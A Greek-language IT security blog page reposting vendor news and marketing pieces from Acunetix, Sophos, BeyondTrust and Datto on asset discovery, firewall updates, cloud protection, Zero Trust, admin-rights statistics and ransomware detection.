Κάποιος άλλος οργανισμός, που πέφτει θύμα της επίθεσης, απευθύνεται στις αρχές ή σε κάποια άλλη αρμόδια υπηρεσία για να ξεκινήσει εγκληματολογική έρευνα και από την έρευνα που πραγματοποιήθηκε αποκαλύφθηκε ότι ένας τομέας που ανήκει στην επιχείρησή σας χρησιμοποιήθηκε σε αυτή την μεγάλη εκστρατεία ηλεκτρονικού «ψαρέματος». Στη συνέχεια, η επιχείρηση που έπεσε θύμα της επίθεσης προχωράει σε αγωγή εναντίον σας -ως συνεργού σε έγκλημα- ζητώντας αποζημίωση.

Το παραπάνω σενάριο, είναι ακριβώς αυτό που συμβαίνει συνήθως στην περίπτωση που αφήσετε πίσω σας απροστάτευτα περιουσιακά στοιχεία σας.

Πως λειτουργεί το Web Asset Discovery;

Τα δημοσίως προσβάσιμα διαδικτυακά περιουσιακά στοιχεία συνήθως διαθέτουν κάποιο τύπο πληροφορίας που μπορεί να οδηγήσει στον προηγούμενο ιδιοκτήτη τους. Για παράδειγμα, αν κάποιο στοιχείο είναι διαθέσιμο σε δημόσιο domain, αυτό το domain μπορεί να περιέχει πληροφορίες εγγραφής (registration) που οδηγούν στον ιδιοκτήτη του. Αν το διαδικτυακό στοιχείο είναι διαθέσιμο μέσω ενός ασφαλούς καναλιού, τότε το πιστοποιητικό μπορεί να περιέχει πληροφορίες που οδηγούν στον ιδιοκτήτη του.

Το χαρακτηριστικό Asset Discovery στο Acunetix ψάχνει διαρκώς για δημόσια διαθέσιμες πληροφορίες και «σαρώνει» τον ιστό για να εντοπίσει τυχόν νέα περιουσιακά στοιχεία που ενδέχεται να σχετίζονται με την επιχείρηση σας. Στη συνέχεια, για λόγους ευκολίας, σας επιτρέπει να εξετάσετε την λίστα με τα στοιχεία που έχουν αναγνωριστεί και να αποφασίσετε αν κάποιο από αυτά πρέπει να αντιμετωπίζεται ως στόχος για το Acunetix. Δείτε πως μπορείτε να χρησιμοποιήσετε το asset discovery στη πράξη.

Το Asset Discovery είναι ήδη διαθέσιμο για όλες τις εκδόσεις on-premises του Acunetix και σύντομα θα είναι διαθέσιμο και στο Acunetix Online. Για να το δοκιμάσετε, ζητήστε ένα demo του Acunetix Premium.

Πηγή: Acunetix

13

Απρ

Κάθε νέα έκδοση συντήρησης (MR) του XG Firewall v18 περιλαμβάνει νέες και συναρπαστικές βελτιώσεις, όπως ποικιλία χαρακτηριστικών απόδοσης, σταθερότητας και ασφάλειας. Και το MR5 δεν αποτελεί εξαίρεση.

Τι νέο υπάρχει στην v18 MR5

Βελτιώσεις VPN

  • Τεράστια αύξηση κατά 50% στην ταυτόχρονη χωρητικότητα σήραγγας IPSec VPN κατά μήκος της γραμμής
  • Κοινή χρήση της θύρας 443 μεταξύ SSL VPN και τείχους προστασίας διαδικτυακών εφαρμογών (WAF)
  • Υποστήριξη αρχείων provisioning IPSec για απομακρυσμένη πρόσβαση μέσω του Sophos Connect v2.1

SD-WAN

  • Ενσωμάτωση με το Azure Virtual WAN για ένα ολοκληρωμένο υπερκείμενο δίκτυο SD-WAN

Authentication

Διαχείριση πιστοποιητικών και ασφάλεια

  • Βελτιώσεις σε φόρμες δημιουργίας πιστοποιητικών και αιτημάτων υπογραφής πιστοποιητικών
  • Βελτιστοποιημένη ασφάλεια για ιδιωτικά κλειδιά
  • Υποστήριξη Μεταφόρτωσης/ λήψης για πιστοποιητικά τύπου PEM
  • Βελτιωμένες ροές εργασίας για τη διαχείριση πιστοποιητικών

Συγχρονισμένη ασφάλεια

  • Βελτιστοποιημένη εγγραφή και κατάργηση εγγραφής σε εγκαταστάσεις υψηλής διαθεσιμότητας (HA)
  • Βελτιώσεις Missing Heartbeat για τη μείωση των ειδοποιήσεων που αποστέλλονται για προβλεπόμενες/ αναμενόμενες αλλαγές στην κατάσταση τερματικών συσκευών

Sophos Central Firewall Reporting

  • Νέα αναφορά Cloud Application (CASB)
  • Τιμολόγηση MSP Flex για συνεργάτες MSP

Δείτε τις πλήρεις σημειώσεις έκδοσης στο Sophos Community Blog.

Άλλες πρόσφατες βελτιώσεις

Αν δεν «τρέχετε» το τελευταίο firmware v18 για το τείχος προστασίας σας, τότε χάνετε τεράστιο αριθμό νέων δυνατοτήτων και δεκάδες επιδιορθώσεις.

Πέρα από τις παραπάνω, έχουν προστεθεί και άλλες δυνατότητες στις εκδόσεις συντήρησης v18 όπως:

Βελτιώσεις υψηλής διαθεσιμότητας

  • Βελτιωμένη υποστήριξη FastPath για ενεργά-παθητικά ζεύγη
  • Υποστήριξη HA στο AWS χρησιμοποιώντας AWS Transit Gateway
  • Βελτιώσεις εγκατάστασης, αξιοπιστίας και σταθερότητας

VPN και Sophos Connect Remote Access Client

  • Τεράστια αύξηση της χωρητικότητας σύνδεσης SSL VPN (έως και 3-6x)
  • Provisioning πολιτικής απομακρυσμένης πρόσβασης IPSec με το Sophos Connect v2.1
  • Ομαδική υποστήριξη για το Sophos Connect που επιτρέπει εισαγωγές από AD/ LDAP / κλπ.
  • Νέες προηγμένες επιλογές για απομακρυσμένη πρόσβαση IPSec
  • Οι λήψεις Sophos Connect ενεργοποιούνται από το portal χρήστη
  • Επιβολή του TLS 1.2 για site-to-site SSL και σήραγγες VPN απομακρυσμένης πρόσβασης

Συγχρονισμένη ασφάλεια

  • Μια νέα επιλογή για το Synchronized App Control για τον αυτόματο καθαρισμό των εφαρμογών άνω του ενός μηνός που ανακαλύφθηκαν

Υποστήριξη πλατφόρμας Cloud

  • Υποστήριξη για νέα AWS instances (C5/ M5 και T3)
  • Υποστήριξη για πρότυπα σχηματισμού Cloud
  • Υποστήριξη ζώνης Virtual WAN σε προσαρμοσμένες gateways για χρήση μονού βραχίονα μετά το deployment
  • Υποστήριξη Nutanix και Nutanix Flow

Sophos Central

  • Ομαδική διαχείριση τείχους προστασίας μέσω του Partner Dashboard
  • Προγραμματισμός ενημερώσεων υλικολογισμικού (firmware)
  • Υποστήριξη multi-firewall reporting σε όλες τις ομάδες firewall
  • Αποθήκευση, προγραμματισμός και εξαγωγή αναφορών από το Sophos Central

Βελτιώσεις ασφάλειας και ελέγχου ταυτότητας

  • Ισχυρότερος αλγόριθμος κατακερματισμού (hashing) κωδικού πρόσβασης (απαιτείται αλλαγή κωδικού πρόσβασης)
  • Αυτόματο web filtering του Internet Watch Foundation (IWF) για την αναγνώριση ιστοσελίδων με περιεχόμενο σεξουαλικής κακοποίησης ανηλίκων
  • Υποστήριξη για τη δημιουργία χρηστών σε μορφή UPN για έλεγχο ταυτότητας RADIUS

Εύκολο και δωρεάν

Φυσικά, όλες οι παραπάνω δυνατότητες προσφέρονται με τη μορφή αναβάθμισης δωρεάν για όλους τους πελάτες της Sophos. Η αναβάθμιση του firmware από την κονσόλα του firewall είναι εξαιρετικά απλή υπόθεση (ουσιαστικά είναι υπόθεση ενός κλικ) ενώ μπορείτε να προγραμματίσετε την ενημέρωση και μέσω του Sophos Central.

Αναβαθμίστε στο v18 σήμερα!

Τώρα είναι η κατάλληλη στιγμή για αναβάθμιση. Αν ενδιαφέρεστε να μάθετε περισσότερα σχετικά με τις βελτιώσεις στην v18, ρίξτε μία ματιά στα εξαιρετικά παρακάτω άρθρα, τα οποία θα σας βοηθήσουν να αξιοποιήσετε στο έπακρο τις πολλές νέες δυνατότητες της έκδοσης 18:

Πηγή: Sophos

8

Απρ

Ανάλογα με τις ανάγκες και τις ιδιαιτερότητες της επιχείρησης σας, ενδέχεται να «τρέχετε» διακομιστές στις εγκαταστάσεις σας (on-premises), να «καταναλώνετε» cloud-based εφαρμογές ή να φιλοξενείτε πόρους σε ιδιωτικά και δημόσια περιβάλλοντα cloud χρησιμοποιώντας κάποια από τις πλατφόρμες AWS, Azure ή GCP. Είναι πολύ πιθανό μάλιστα να κάνετε όλα τα παραπάνω.

Το cloud αποκτά με ταχύτατους ρυθμούς όλο και περισσότερο κεντρικό ρόλο στις καθημερινές λειτουργίες των περισσότερων οργανισμών. Μάλιστα, το 90% των υπηρεσιών των επιχειρήσεων βρίσκονται σε περιβάλλοντα υπολογιστικού νέφους. Λόγω αυτής της εξέλιξης, οι κυβερνοεγκληματίες φαίνεται να βρίσκονται σε κατάσταση εγρήγορσης για να «αρπάξουν» και την παραμικρή ευκαιρία που θα τους δοθεί από το cloud – σε βαθμό μάλιστα που το 70% των εταιρειών που χρησιμοποιούν το δημόσιο σύννεφο υπέστη ένα περιστατικό ασφάλειας cloud τους τελευταίους 12 μήνες.

Προστατεύοντας το υβριδικό σύννεφο

Οι οργανισμοί έχουν ξεκινήσει να υϊοθετούν όλο και περισσότερο ένα υβριδικό μοντέλο cloud, το οποίο αποτελεί ένα συνδυασμό υπηρεσιών σε SaaS, δημόσια και ιδιωτικά περιβάλλοντα, ενώ παράλληλα διατηρούν την παραδοσιακή υποδομή στις εγκαταστάσεις τους ωσότου αποφασίσουν να ολοκληρώσουν την μετάβαση τους.

Σε ότι αφορά την προστασία των πόρων σας – όπου κι αν βρίσκονται οι πόροι – είναι απαραίτητο να κάνετε δύο πράγματα:

  1. Να προστατεύσετε τα πραγματικά δεδομένα που βρίσκονται στους διακομιστές στις εγκαταστάσεις σας (on-premises) όπως και τους φόρτους εργασίας υβριδικού cloud.
  2. Να ασφαλίσετε τα δίκτυα στα οποία διατηρούνται οι πόροι, είτε βρίσκονται στο cloud είτε στα γραφεία sσας.

Προστατεύοντας δεδομένα και φόρτους εργασίας

Το Sophos Intercept X for Server προστατεύει τα δεδομένα και τους φόρτους εργασίας σας σε διακομιστές Windows και Linux (on-premises ή στο cloud) και εστιάζει κυρίως:

  • Στην αναχαίτηση του προηγμένου κακόβουλου λογισμικού, συμπεριλαμβανομένου του ransomware, στην αποτροπή επιθέσεων που βασίζονται σε exploits καθώς και στην αναχαίτηση κακόβουλου λογισμικού για διακομιστές.
  • Στην προστασία περιβαλλόντων virtual desktop που χρησιμοποιούνται για την υποστήριξη κρίσιμης σημασίας απομακρυσμένων ομάδων εργασίας.
  • Στο «κλείδωμα» των διακομιστών σας για τον έλεγχο του τι μπορεί να εκτελεστεί και τι δεν μπορεί καθώς και στην παροχή ειδοποιήσεων σχετικά με τυχόν μη εξουσιοδοτημένες απόπειρες αλλαγών.
  • Στο deployment και στη συντήρηση των πάντων από μία μόνο κονσόλα, χωρίς να εξαιρούνται και μικτά σενάρια με φόρτους εργασίας στο cloud και διακομιστές «εσωτερικά».

Η Sophos έχει επίσης το Intercept X for Servers with EDR (Endpoint Detection and Response), το οποίο επεκτείνει περαιτέρω την προστασία σας, βοηθώντας σας να:

Εκθέσετε τις απειλές που αποφεύγουν τις παραδοσιακές άμυνες, να ψάξετε για ζητήματα, να κατανοήσετε πως πραγματοποιήθηκαν οι επιθέσεις και να ανταποκρίνεστε συστηματικά σε περιστατικά.

Ανιχνεύετε αυτόματα cloud workloads καθώς και κρίσιμης σημασίας cloud υπηρεσίες όπως είναι οι S3 buckets, οι βάσεις δεδομένων και οι server-less λειτουργίες.

Εντοπίσετε ανασφαλή deployments σαρώνοντας διαρκώς με τη βοήθεια της Τεχνητής Νοημοσύνης (ΑΙ) τα περιβάλλοντα cloud σας για μη ασφαλείς διαμορφώσεις και για ανωμαλίες στο δίκτυο ή στην πρόσβαση των χρηστών.

Από την άλλη πλευρά, εξίσου απαραίτητη για την προστασία των cloud workloads σας είναι η ορατότητα: να βλέπετε τι «τρέχει» και να διαμορφώνετε με ασφάλεια τις υπηρεσίες cloud για να αποτρέψετε παραβιάσεις.

Για απαράμιλλη ορατότητα, στραφείτε στο Sophos Cloud Optix, την υπηρεσία Διαχείρισης Στάσης Ασφαλείας Cloud της Sophos. H Sophos χρησιμοποιεί η ίδια το Cloud Optix για να εντοπίζει εύκολα ευπάθειες σε πόρους cloud, να διασφαλίζει τη συμμόρφωση και να ανταποκρίνεται ταχύτερα σε απειλές σε περιβάλλοντα Amazon Web Services που φιλοξενούν το Sophos Central.

Το Cloud Optix προσφέρει:

  • Ορατότητα στη κίνηση δικτύου και περιουσιακών στοιχείων για περιβάλλοντα AWS, Azure και Google Cloud
  • Προτεραιοποίηση των ζητημάτων ασφαλείας με βάση την επικινδυνότητα προσφέροντας παράλληλα καθοδήγηση για αποκατάσταση/ αντιμετώπιση τους.
  • Προσδιορισμός των υπερβολικά προνομιούχων ρόλων IAM προτού αξιοποιηθούν από κακόβουλους παράγοντες.
  • Βελτιστοποίηση του κόστους AWS και Azure σε μία μόνο οθόνη
  • Οπτικοποίηση των agents προστασίας των φόρτων εργασίας διακομιστή και των firewalls της Sophos.

Αν και οι ειδοποιήσεις και οι προειδοποιήσεις είναι χρήσιμες, είναι πολύ εύκολο να σας κατακλύσουν. Και αυτό ενδεχομένως μπορεί να αποτελέσει μεγάλο πρόβλημα όταν πρόκειται να αποφασίσουμε ποια ζητήματα πρέπει να αντιμετωπίσουμε πρώτα.

Ένα από τα κύρια πλεονεκτήματα του Cloud Optix για την ομάδα της Sophos είναι ότι έχει την ικανότητα να επισημαίνει τα σημεία που πρέπει να εστιάσετε την προσοχή σας και να λάβετε προληπτικά μέτρα (π.χ. «κλείνοντας» τυχόν κενά ασφαλείας) προτού προκύψουν παραβιάσεις.

Προστασία δικτύου

Με τα δεδομένα και τους φόρτους εργασίας σας ασφαλείς, η επόμενη σκέψη είναι η προστασία του δικτύου σας.

Το Sophos Firewall παρέχει κορυφαία απόδοση και προστασία προστατεύοντας το εταιρικό δίκτυο, το ιδιωτικό cloud καθώς και περιβάλλοντα δημόσιου cloud AWS και Azure. Προστατεύει δίκτυα, εφαρμογές και διασφαλίζει την ασφάλεια της δικτυακής κίνησης.

Με το Sophos Firewall, λαμβάνετε:

Μια όλα-σε-μία λύση: τα έτοιμα templates σχεδιάστηκαν ειδικά για να προστατεύουν περιβάλλοντα από γνωστές και αναδυόμενες απειλές διατηρώντας παράλληλα υψηλή τη διαθεσιμότητα των διαδικτυακών εφαρμογών.

Εκτεταμένο reporting, συμπεριλαμβανομένων λεπτομερών πληροφοριών σχετικά με τη δραστηριότητα των χρηστών και του δικτύου

Ορατότητα στις εφαρμογές cloud και στο shadow IT καθώς και αυτοματοποιημένη ανταπόκριση σε απειλές

Το Sophos Firewall σας δίνει τη δυνατότητα να ενισχύσετε τα cloud workloads ενάντια σε απόπειρες hacking, όπως είναι οι SQL injection και cross-site scripting. Για να διευκολύνει επίσης το deployment και για να εξασφαλιστεί ότι οι εφαρμογές και οι χρήστες σας μπορούν πάντα να συνδεθούν, τα πάντα είναι διαθέσιμα σε μια ενιαία, προκαθορισμένη virtual machine για μέγιστο uptime.

Προστασία του «απανταχού οργανισμού»

Για να μάθετε περισσότερα για τον τρόπο με τον οποίο το Sophos μπορεί να σας βοηθήσει να επιτρέψετε στους χρήστες σας να εργάζονται με ασφάλεια σε οποιαδήποτε συσκευή από οποιαδήποτε τοποθεσία, διαβάστε τo whitepaper Securing the Anywhere Organization.

6

Απρ

«Όταν εργαζόμουν ως εργολάβος εγκατάστασης firewall στην εταιρεία Trusted Information Systems» γράφει η Diana Kelley (Co-Founder και CTO της SecurityCurve) στο εταιρικό blog της BeyondTrust «χρησιμοποιούσαμε μια φράση για τον τρόπο με τον οποίο πολλές εταιρείες έβλεπαν τα συνδεδεμένα δίκτυα: τα έβλεπαν ως… Mallomars».

Αν δεν γνωρίζετε τι είναι τα Mallomars, πρόκειται για μπισκότα, με σκληρό, τραγανό εξωτερικό από κράκερ ολικής άλεσης (Graham Cracker) και σοκολάτα και που στο εσωτερικό τους έχουν ένα μαλακό, κρεμώδες marshmallow. «Οι εταιρείες “Mallomar” πίστευαν ότι εφόσον εγκαθιστούσαν ένα αρκετά ισχυρό τείχος προστασίας -το σκληρό, τραγανό εξωτερικό στρώμα που λέγαμε- δεν θα είχαν να ανησυχούν για την ασφάλεια στο εσωτερικό. Τι συνέβαινε όμως στην πραγματικότητα; Τα εσωτερικά δίκτυα τους λοιπόν δεν ήταν ασφαλή – όπως το κρεμώδες marshmallow στο κέντρο ενός μπισκότου τύπου Mallomar.

Ακόμα και τότε όμως, οι περισσότεροι ειδικοί στον τομέα της δικτυακής ασφαλείας είχαν ήδη αναγνωρίσει ότι ανεξάρτητα από το πόσο καλό μπορεί να είναι ένα firewall, η δικτυακή ασφάλεια είναι πολλά περισσότερα πράγματα από μία απλή gateway. Αυτός είναι ο λόγος που οι περισσότεροι επαγγελματίες στον τομέα της ασφάλειας συνιστούν μία προσέγγιση “defense-in-depth” (ψηφιακή άμυνα-σε-βάθος). Αντί λοιπόν να βλέπω το εσωτερικό δίκτυο ως έναν ανοικτό και αξιόπιστο χώρο, συνεργάστηκα με εταιρείες για να προσδιορίσω που είχε νόημα να προστεθούν επιπλέον επίπεδα “τμηματοποίησης” και ελέγχου της ταυτότητας, για την μετατροπή των δικτύων τους από Mallomars” σε “Jawbreakers” που είναι σκληρά μέσα-έξω.

Ήταν στις αρχές της δεκαετίας του 2000, όταν το Jericho Forum και η αρχή του de-perimeterization ξεκίνησαν να προκαλούν ρήγματα στην παραδοσιακή σκέψη Mallomar (που είχε βάση την περίμετρο). Σήμερα, την πλέον σύγχρονη εξελικτική προσαρμογή αποτελεί το Zero Trust, ένας όρος που επινοήθηκε από τον John Kindervag ενώ εργαζόταν στην εταιρεία Forrester. Το Zero Trust προωθεί την προστασία σε κάθε πόρο και είναι ιδανικό για περιπτώσεις κατανεμημένου εργατικού δυναμικού και cloud-first αρχιτεκτονικές. Τέλος στο ανοικτό, αξιόπιστο εσωτερικό: κάθε ενέργεια και πρόσβαση λαμβάνεται ως μη αξιόπιστη ωσότου επαληθευτεί.

Τα καλά νέα σε αυτή την περίπτωση είναι ότι αν ασκείτε την κυβερνοασφάλεια εδώ και αρκετό καιρό και έχετε μία υγιή εκτίμηση για την ψηφιακή άμυνα-σε-βάθος (DiD), τότε η υιοθέτηση μιας νοοτροπίας Zero Trust Architecture (ZTA) θα είναι ευκολότερη για σας. Οι εταιρείες επίσης που έχουν ήδη υιοθετήσει την τμηματοποίηση, την ασφαλή και ισχυρή διαχείριση περιουσιακών στοιχείων υλικού και λογισμικού και την διαχείριση προνομιούχων λογαριασμών/ ταυτότητας και έχουν μία στρατηγική προστασίας με γνώμονα τους πόρους τότε έχουν ήδη τα περισσότερα από τα βασικά στοιχεία μίας αρχιτεκτονικής Zero Trust (ZTA). Οι τεχνικές εξελίξεις μάλιστα όπως το software-defined networking (SDN) και η διαχείριση μυστικών καθιστούν τα DiD και ZTA πολύ πιο απλά από άποψη εφαρμογής και διαχείρισης.

Φτάσατε αργοπορημένοι στο πάρτι για τα DiD και ZTA; Δεν υπάρχει λόγος ανησυχίας. Αν το δείτε από την θετική πλευρά, έχετε ελεύθερο πεδίο να σχεδιάσετε μία στρατηγική ZTA από το μηδέν: μπορείτε να δημιουργήσετε ένα πρόγραμμα ZTA που βασίζεται στους πόρους και χωρίς τους «παλιομοδίτικους» περιορισμούς. 

Όπως και να έχει, είτε ξεκινήσετε εκ του μηδενός είτε βρίσκεστε σε φάση “αναβάθμισης” μίας εταιρείας με παραδοσιακή περίμετρο (τύπου Mallomar) σε ZTA, βεβαιωθείτε ότι τα παρακάτω βρίσκονται στην κορυφή της λίστας “to-do” σας: 

1.Inventory – Το διαχρονικό ρητό “είναι αδύνατο να διαχειριστείς κάτι που δεν γνωρίζεις” παραμένει επίκαιρο σε ότι αφορά το ZTA, επειδή για να προστατεύσετε τους πόρους σας, πρέπει καταρχήν να γνωρίζετε ποιοι είναι αυτοί οι πόροι. Για αρχή, βεβαιωθείτε ότι έχετε έναν τρόπο να διατηρείτε ενημερωμένα στοιχεία για όλους τους πόρους σας όπως για:

  • Λογισμικό
  • Υλικό (hardware)
  • Ροές εργασίας
  • Διακομιστές cloud
  • Ροές εργασίας στο cloud
  • Άνθρωποι (και εμείς οι άνθρωποι είμαστε πόροι!)

2.Write – Εντάξει, πολλοί άνθρωποι μισούν την πολιτική γραφής, ωστόσο αποτελεί θεμέλιο για να γίνει κατανοητό τι επιτρέπεται και τι δεν επιτρέπεται στο περιβάλλον ενός οργανισμού. Και αν πρέπει να περάσετε από επίσημες αξιολογήσεις ασφαλείας, οι πολιτικές είναι το πρώτο πράγμα που θα ζητήσουν οι περισσότεροι αξιολογητές. Ένα άλλο πλεονέκτημα της ύπαρξης πολιτικών για τα ZTA deployments είναι ότι θα σας βοηθήσουν να σκεφτείτε τι είναι και τι δεν είναι δυνατό στο χαρτί και στον μαυροπίνακα πριν από την δαπανηρή φάση της αγοράς νέας τεχνολογίας ή αναβάθμισης/ αναδιάρθρωσης των υφιστάμενων.

3.Win Small – Τώρα που το απόθεμά σας είναι ενημερωμένο και γνωρίζετε τις πολιτικές, ήρθε η ώρα να διαλέξετε έναν ή δύο υποψήφιους για το ZTA προτού προχωρήσετε στο καθοριστικό πλήρες deployment. Υπάρχουν πολλές επιλογές deployment για το ZTA, οπότε διαλέξτε μία που ταιριάζει καλύτερα στην εταιρεία σας. Για παράδειγμα, ορισμένες λύσεις ZTA απαιτούν την εγκατάσταση ενός agent στις τερματικές συσκευές σας. Κάτι τέτοιο βεβαίως μπορεί να μην αποτελεί επιλογή για ορισμένα περιβάλλοντα BYOD, ωστόσο ένα cloud gateway point επιβολής πολιτικής θα μπορούσε να ταιριάξει τέλεια. Ότι κι αν αποφασίσετε, η μεγάλη νίκη έρχεται με το προσεκτικό deployment ενός μικρού υποψηφίου. Μόλις διαπιστώσετε ότι όλοι οι υποψήφιοι στις δοκιμές σας λειτουργούν ομαλά, χρησιμοποιήστε όσα μάθατε από τις δοκιμές και την οργανωτική θέληση σας για να επεκτείνετε τη λειτουργία του ZTA σε ολόκληρο τον οργανισμό.

 Για μια βαθύτερη εξερεύνηση για το πως να κάνετε το ZTA να λειτουργήσει για τον οργανισμό σας παρακολουθήστε το on-demand διαδικτυακό σεμινάριο μου: Zero Buzz – Zero Trust

Πηγή: BeyondTrust

2

Απρ

Σύμφωνα με την γνωστή εταιρεία κυβερνοασφάλειας BeyondTrust, η κατάργηση των δικαιωμάτων διαχειριστή από τις τερματικές συσκευές θα είχε ως αποτέλεσμα να αντιμετωπιστεί άμεσα το 56% των κρίσιμης σημασίας ευπαθειών της Microsoft που εμφανίστηκαν το περασμένο έτος.

Από μία πρόσφατη έρευνα της BeyondTrust μαθαίνουμε ότι το 2020 ανακαλύφθηκαν 1268 νέες ευπάθειες και κενά ασφαλείας που αφορούσαν προϊόντα της Microsoft, σημειώνοντας αύξηση 48% σε σχέση με τη περασμένη χρονιά.

Ο αριθμός μάλιστα των ευπαθειών/ κενών ασφαλείας που αναφέρονται έχει αυξηθεί κατά 181% τα τελευταία πέντε χρόνια, κάτι που είναι ιδιαίτερα εντυπωσιακό.

Παρόλα αυτά, η BeyondTrust έκανε γνωστό στην έρευνα της ότι το 56% των κρίσιμης σημασίας ευπαθειών της Microsoft που εμφανίστηκαν το περασμένο έτος θα μπορούσαν να αντιμετωπιστούν αποτελεσματικά απλώς με την «αφαίρεση» των δικαιωμάτων διαχειριστή από τις τερματικές συσκευές (endpoints).

Πηγαίνοντας μάλιστα τα πράγματα παραπέρα, η εταιρεία κυβερνοασφάλειας έκανε γνωστό ότι ειδικά για τα προϊόντα Internet Explorer και Microsoft Edge, με την κατάργηση των δικαιωμάτων διαχειριστή θα μπορούσε να το αντιμετωπιστεί αποτελεσματικά το 87% των κρίσιμης σημασίας ευπαθειών τους. Το ίδιο προκύπτει και για το 80% των ευπαθειών των προϊόντων Office (Excel, Word, PowerPoint κ.ά.) και το 66% των ευπαθειών που επηρεάζει τους Windows Servers.

«Ότι το patching πρέπει πάντα να γίνεται είναι αδιαμφισβήτητο γεγονός και αποτελεί βασική πρακτική για την κυβερνοασφάλεια» δήλωσε ο Morey Haber, Chief Technology Officer και Chief Information Security Officer της BeyondTrust.

«Ωστόσο, η εκτροπή μιας επίθεσης με σωστές πολιτικές κυβερνοασφάλειας όπως είναι η κατάργηση των δικαιωμάτων διαχειριστή καθιστά τελικώς το περιβάλλον εργασίας αλλά και όσους εργάζονται από το σπίτι ακόμη πιο ασφαλείς. Και το πιο σημαντικό, ακολουθώντας την αρχή του ελάχιστου προνομίου μπορείτε να κερδίσετε πολύτιμο χρόνο για patching στον οργανισμό σας όταν γνωστοποιηθούν κρίσιμης σημασίας ευπάθειες και κενά ασφαλείας» συμπλήρωσε ο κ. Morey Haber.

Τα παραπάνω έγιναν γνωστά την ώρα που η BeyondTrust επεκτείνεται στην Ιαπωνία, στην Ασία και στον Ειρηνικό ανοίγοντας νέα γραφεία στη Σιγκαπούρη και προσλαμβάνοντας το πρώην στέλεχος της BAE Systems, Nick Turnbull ως Senior Vice President για την περιοχή.

Πηγή

31

Μαρ

Τον περασμένο Δεκέμβριο, η Datto παρουσίασε το Ransomware Detection για το Datto RMM.

Αυτή η ενσωματωμένη δυνατότητα του Datto RMM δίνει τη δυνατότητα στους παρόχους διαχειριζόμενων υπηρεσιών (MSPs) να ενισχύσουν την ασφάλεια των τερματικών συσκευών των πελατών τους με την προσθήκη ενός πρόσθετου επιπέδου ασφαλείας με στόχο να ελαχιστοποιήσουν τις συνέπειες μίας επίθεσης crypto-ransomware. Σε ελάχιστους μήνες, περισσότεροι από 600 συνεργάτες όσον αφορά το Datto RMM προχώρησαν σε εγγραφή για να προστατεύσουν περισσότερες από 300.000 τερματικές συσκευές, εντοπίζοντας περισσότερες από 30 περιπτώσεις ransomware για τους πελάτες τους.

Πέρα από την ολοένα αυξανόμενη απειλή του ransomware, η τεχνολογία πίσω από το Datto RMM που βρισκόταν σε παραγωγή στο Datto Workplace για διάστημα μεγαλύτερο του ενός χρόνου έχει ήδη εδραιωθεί και αποδείξει την αποτελεσματικότητα της.

Επιπλέον, πριν από την κυκλοφορία του προϊόντος, η Datto ανέθεσε στην MRG Effitas, μία κορυφαία, παγκοσμίως γνωστή στον τομέα της ασφάλειας πληροφορικής και ανεξάρτητη εταιρεία δοκιμών και διασφάλισης αποτελεσματικότητας, την οποία εμπιστεύονται πάροχοι anti-malware σε όλο τον κόσμο, για να αξιολογήσει το RMM Ransomware Detection και να το συγκρίνει με κορυφαία εργαλεία AV με παρόμοιες δυνατότητες.

Οι δοκιμές που πραγματοποίησε η MRG Effitas περιλαμβάνουν τα τεστ: In-the-Wild Real Ransomware, False Positive, Ransomware Simulator και Performance. Μετά από εβδομάδες αυστηρής αξιολόγησης του ενσωματωμένου στο Datto RMM χαρακτηριστικού ανίχνευσης Ransomware, η MRG Effitas έκανε γνωστά τα ακόλουθα αποτελέσματα:

  • In-the-Wild Real Ransomware Test: Το Datto RMM Ransomware Detection εντόπισε το 100% των ενεργών δειγμάτων ransomware από πρόσφατες εκστρατείες.
  • False Positive Test: Το Datto RMM Ransomware Detection επέτρεψε την εκτέλεση όλων των φυσιολογικών διαδικασιών μαζικής τροποποίησης -στο 100%-  που μιμούνταν τη δραστηριότητα ransomware χωρίς να παρουσιαστούν ψευδώς θετικά.
  • Ransomware Simulator Test: Το Datto RMM Ransomware εντόπισε και απόκλεισε το 100% των δειγμάτων της MRG Effitas που περιείχαν έγκυρες μεθόδους επίθεσης που χρησιμοποιούνται από το ransomware όπως παραδοσιακές μεθόδους κρυπτογράφησης και τυπικές τεχνικές αποφυγής.
  • Performance Test: Η απόδοση των διαχειριζόμενων σταθμών εργασίας επηρεάστηκε στο ελάχιστο (χρόνος εκκίνησης, λειτουργία περιηγητή κ.λπ.) καθώς είχε τις μικρότερες επιπτώσεις στην απόδοση από όλα τα προϊόντα που έλαβαν μέρος στη δοκιμή.

Για να μάθετε περισσότερα σχετικά με τον τρόπο που το Datto RMM Ransomware Detection μπορεί να σας βοηθήσει να προστατέψετε τις τερματικές συσκευές των πελατών σας, προσθέτοντας ένα επιπλέον επίπεδο ασφάλειας στα παραδοσιακά προϊόντα AV για να ελαχιστοποιήσετε τις επιπτώσεις του crypto-ransomware, μπορείτε να μιλήσετε με έναν ειδικό σήμερα κιόλας.

Datto RMM Ransomware Detection Put to the Test

Πηγή: Datto

24

Μαρ

Την περασμένη χρονιά, ένα εκπληκτικό 51% των οργανισμών χτυπήθηκε από ransomware και στο 73% των επιθέσεων, οι επιτιθέμενοι κυβερνοεγκληματίες κατάφεραν να επιτύχουν την κρυπτογράφηση των δεδομένων*.

Όταν σκεφτείτε ότι μια επίθεση πλήρους κλίμακας μπορεί να φέρει κατά μέσο όρο την επιχείρηση πίσω κατά περίπου $755.000* είναι σαφές, ότι η προστασία όλων των συσκευών και των λειτουργικών σας συστημάτων δεν είναι κάτι που είναι «καλό να έχετε» αλλά «πρέπει να έχετε».

Επίσης, η ασφάλεια όλων των συσκευών και πλατφορμών που χρησιμοποιούνται αποτελεί βασικό πυλώνα για την ασφαλή απομακρυσμένη εργασία -επιτραπέζιοι υπολογιστές, φορητοί υπολογιστές, φορητές συσκευές, Windows, macOS, Linux, Android και iOS.

Προστασία όλων των συσκευών σας με Sophos

Το Sophos Intercept X παρέχει κορυφαία προστασία για τις τερματικές συσκευές, τους διακομιστές και τις φορητές συσκευές σας. Χρησιμοποιεί πολλαπλά τεχνολογικά επίπεδα για να αποτρέψει και να σταματήσει τους επιτιθέμενους σε πολλά σημεία της αλυσίδας επίθεσης:

Η τεχνολογία anti-ransomware αποτρέπει τη μη εξουσιοδοτημένη κρυπτογράφηση, επαναφέροντας τα αρχεία στις ασφαλείς καταστάσεις τους.

Η τεχνολογία Deep Learning AI η οποία αναπτύχθηκε από τους ειδικούς της Sophos AI, αποκλείει τόσο το γνωστό όσο και το μη γνωστό κακόβουλο λογισμικό με εξαιρετικά χαμηλό ποσοστό ψευδώς θετικών.

Η τεχνολογία anti-exploit σταματά τα exploits, τις ενεργές αντίπαλες τεχνικές, τις file-less επιθέσεις και τις επιθέσεις που βασίζονται σε scripts.

